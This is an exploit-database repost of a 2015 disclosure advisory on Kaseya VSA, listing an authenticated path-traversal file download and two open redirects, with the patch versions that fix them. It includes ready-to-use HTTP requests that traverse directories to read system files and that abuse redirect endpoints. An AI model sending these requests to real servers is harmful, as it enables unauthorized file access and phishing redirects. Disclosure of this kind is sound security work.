Search...

Kaseya Virtual System Administrator File Download / Open Redirect Vulnerabilities

2015-07-14T00:00:00

ID 1337DAY-ID-23882
Type zdt
Reporter Pedro Ribeiro
Modified 2015-07-14T00:00:00

Description

Kaseya Virtual System Administrator suffers from arbitrary file download open redirection vulnerabilities.

                                        
                                            Two vulns in Kaseya Virtual System Administrator - an authenticated
arbitrary file download and two lame open redirects.

Full advisory text below and at [1]. Thanks to CERT for helping me to
disclose these vulnerabilities [2].

&gt;&gt; Multiple vulnerabilities in Kaseya Virtual System Administrator
&gt;&gt; Discovered by Pedro Ribeiro ([email protected]), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 13/07/2015 / Last updated: 13/07/2015

&gt;&gt; Background on the affected product:
"Kaseya VSA is an integrated IT Systems Management platform that can
be leveraged seamlessly across IT disciplines to streamline and
automate your IT services. Kaseya VSA integrates key management
capabilities into a single platform. Kaseya VSA makes your IT staff
more productive, your services more reliable, your systems more
secure, and your value easier to show."


&gt;&gt; Technical details:
#1
Vulnerability: Arbitary file download (authenticated)
Affected versions: unknown, at least v9

GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini
Referer: http://10.0.0.3/

A valid login is needed, and the Referrer header must be included. A
sample request can be obtained by downloading any file attached to any
ticket, and then modifying it with the appropriate path traversal.
This will download the C:\boot.ini file when Kaseya is installed in
the default C:\Kaseya directory. The file download root is the
WebPages directory (&lt;Kaseya_Install_Dir&gt;\WebPages\).


#2
Vulnerability: Open redirect (unauthenticated)
Affected versions: unknown, at least v7 to XXX

a)
http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com

b)
GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com
Host: www.google.com
(host header has to be spoofed to the target)


&gt;&gt; Fix:
R9.1: install patch 9.1.0.4
R9.0: install patch 9.0.0.14
R8.0: install patch 8.0.0.18
V7.0: install patch 7.0.0.29

#  0day.today [2018-01-04]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-23882", "type": "zdt", "bulletinFamily": "exploit", "title": "Kaseya Virtual System Administrator File Download / Open Redirect Vulnerabilities", "description": "Kaseya Virtual System Administrator suffers from arbitrary file download open redirection vulnerabilities.", "published": "2015-07-14T00:00:00", "modified": "2015-07-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/23882", "reporter": "Pedro Ribeiro", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-04T07:12:35", "viewCount": 7, "enchantments": {"score": {"value": -0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.3}, "sourceHref": "https://0day.today/exploit/23882", "sourceData": "Two vulns in Kaseya Virtual System Administrator - an authenticated\r\narbitrary file download and two lame open redirects.\r\n\r\nFull advisory text below and at [1]. Thanks to CERT for helping me to\r\ndisclose these vulnerabilities [2].\r\n\r\n>> Multiple vulnerabilities in Kaseya Virtual System Administrator\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security (http://www.agileinfosec.co.uk/)\r\n==========================================================================\r\nDisclosure: 13/07/2015 / Last updated: 13/07/2015\r\n\r\n>> Background on the affected product:\r\n\"Kaseya VSA is an integrated IT Systems Management platform that can\r\nbe leveraged seamlessly across IT disciplines to streamline and\r\nautomate your IT services. Kaseya VSA integrates key management\r\ncapabilities into a single platform. Kaseya VSA makes your IT staff\r\nmore productive, your services more reliable, your systems more\r\nsecure, and your value easier to show.\"\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Arbitary file download (authenticated)\r\nAffected versions: unknown, at least v9\r\n\r\nGET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini\r\nReferer: http://10.0.0.3/\r\n\r\nA valid login is needed, and the Referrer header must be included. A\r\nsample request can be obtained by downloading any file attached to any\r\nticket, and then modifying it with the appropriate path traversal.\r\nThis will download the C:\\boot.ini file when Kaseya is installed in\r\nthe default C:\\Kaseya directory. The file download root is the\r\nWebPages directory (<Kaseya_Install_Dir>\\WebPages\\).\r\n\r\n\r\n#2\r\nVulnerability: Open redirect (unauthenticated)\r\nAffected versions: unknown, at least v7 to XXX\r\n\r\na)\r\nhttp://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com\r\n\r\nb)\r\nGET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com\r\nHost: www.google.com\r\n(host header has to be spoofed to the target)\r\n\r\n\r\n>> Fix:\r\nR9.1: install patch 9.1.0.4\r\nR9.0: install patch 9.0.0.14\r\nR8.0: install patch 8.0.0.18\r\nV7.0: install patch 7.0.0.29\n\n# 0day.today [2018-01-04] #", "_state": {"dependencies": 1645352709}}